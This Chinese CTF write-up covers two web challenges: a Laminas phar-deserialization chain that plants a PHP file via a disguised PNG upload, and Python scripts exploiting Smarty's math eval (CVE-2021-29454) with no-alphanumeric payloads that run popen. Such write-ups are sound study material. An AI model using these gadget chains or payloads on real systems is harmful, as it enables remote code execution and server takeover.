2022红明谷杯web

Fan website

题目给了提示,和laminas有关。
2022红明谷杯web_第1张图片
扫描目录得到源码。
审计代码发现题目有个album路由,并且控制器只有一个/module/Album/src/Controller/AlbumController.php

里面包含几个处理函数,可以上传文件,删除文件。
但是上传文件过滤是白名单所以不是很好绕过。
2022红明谷杯web_第2张图片
并且内容里面不能有 HALT_COMPILER
2022红明谷杯web_第3张图片
这就有点此地无银三百两了,无缘无故为啥过滤和phar有关的HALT_COMPILER。
上网搜这个组件的漏洞发现了一个反序列化漏洞https://xz.aliyun.com/t/8975,那就好说了,我们可以上传一个phar文件,然后删除文件调用unlink时触发反序列化。但是还得保证内容大于3kb,所以在序列化时加了个str_repeat('123',1000000)

 

namespace Laminas\View\Resolver{
	class TemplateMapResolver{
		protected $map = ["setBody"=>"system"];
	}
}
namespace Laminas\View\Renderer{
	class PhpRenderer{
		private $__helpers;
		function __construct(){
			$this->__helpers = new \Laminas\View\Resolver\TemplateMapResolver();
		}
	}
}


namespace Laminas\Log\Writer{
	abstract class AbstractWriter{}
	
	class Mail extends AbstractWriter{
		protected $eventsToMail = ["echo '' > /var/www/public/a.php"];  								//  cmd  cmd cmd
		protected $subjectPrependText = null;
		protected $mail;
		function __construct(){
			$this->mail = new \Laminas\View\Renderer\PhpRenderer();
		}
	}
}

namespace Laminas\Log{
	class Logger{
		protected $writers;
		function __construct(){
			$this->writers = [new \Laminas\Log\Writer\Mail()];
		}
	}
}

namespace{
$a = new \Laminas\Log\Logger();
$phar = new Phar("shell.phar"); //后缀名必须为 phar
$phar->startBuffering();
$phar -> setStub('GIF89a'.'');
$phar->setMetadata($a); //将自定义的 meta-data 存入 manifest
$phar->addFromString("a", str_repeat('123',1000000)); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
}
?>

链子出来了还有个问题需要解决。绕过 网上找到篇文章https://www.wangan.com/p/7fygf7a00f0fd793

可以把生成的phar文件gzip压缩。然后将后缀改成png。
上传完成后拿到文件路径。
2022红明谷杯web_第4张图片
文件删除处传入phar:///var/www/public/img/00bf23e130fa1e525e332ff03dae345d.png

2022红明谷杯web_第5张图片
蚁剑连接后得到flag
2022红明谷杯web_第6张图片

Smarty_calculator

扫描后台拿到源码
题目名字就是本题的考点了,php中的smarty模板。
经过搜索发现了和这个相关的cve CVE-2021-29454,是利用smarty中的math
学习一波之后就是可以通过传入{math equation="(( x + y ) / z )" x=2 y=10 z=2}进行计算。

并且源码中存在相关的文件src/Smarty/plugins/function.math.php
在里面发现了eval函数
2022红明谷杯web_第7张图片
那题目考查的应该就是命令执行漏洞了,往上翻,equation里面的内容不能有反引号和$并且左右括号个数要匹配。除此之外,还会进行一个正则匹配。
2022红明谷杯web_第8张图片
大概就是不能存在16进制,不能有字母开头的,否则的话,进入这个foreach循环。
在往下还是一个循环,如果传入的内容中使用的字符串不是equation或者format或者assign就会进行一个替换。
所以我们如果避免这两个循环就可以将传入的内容拼接后放入eval中。
我们很容易想到无数字字母rce。这样就被不会被正则表达式匹配到,也可以绕过另外一个循环(没有其他字母,$param中就只有equation一个键值)。
无数字字母的脚本我之前写了一个比较全的。https://blog.csdn.net/miuzzx/article/details/109143413直接拿自己脚本用了。
采用或运算构造,先来试下phpinfo
2022红明谷杯web_第9张图片

import requests
import urllib.parse
url="http://eci-2ze9vv2h6yb0y4183bod.cloudeci1.ichunqiu.com/"

data={'data':urllib.parse.unquote(''' {math equation="1;('%30%28%30%29%2e%26%2f'|'%40%40%40%40%40%40%40')();//" }''')}

r=requests.post(url,data=data,cookies={'login':'1'})
print(r.text)

在这里插入图片描述
存在df,但是留了个popen,所以可以用popen执行系统命令。
盲猜一波flag路径为/flag,执行系统命令cp /flag a
也就是构造php语句popen('cp /f* a','r')
2022红明谷杯web_第10张图片

import requests
import urllib.parse
url="http://eci-2ze9vv2h6yb0y4183bod.cloudeci1.ichunqiu.com/"

data={'data':urllib.parse.unquote(''' {math equation="1;('%30%2f%30%25%2e'|'%40%40%40%40%40')(('%23%30%00%00%26%00%00%21'|'%40%40%20%2f%40%2a%20%40'),('%32'|'%40'));//" }''')}

r=requests.post(url,data=data,cookies={'login':'1'})
print(r.text)

访问/a得到flag
2022红明谷杯web_第11张图片

你可能感兴趣的:(ctf)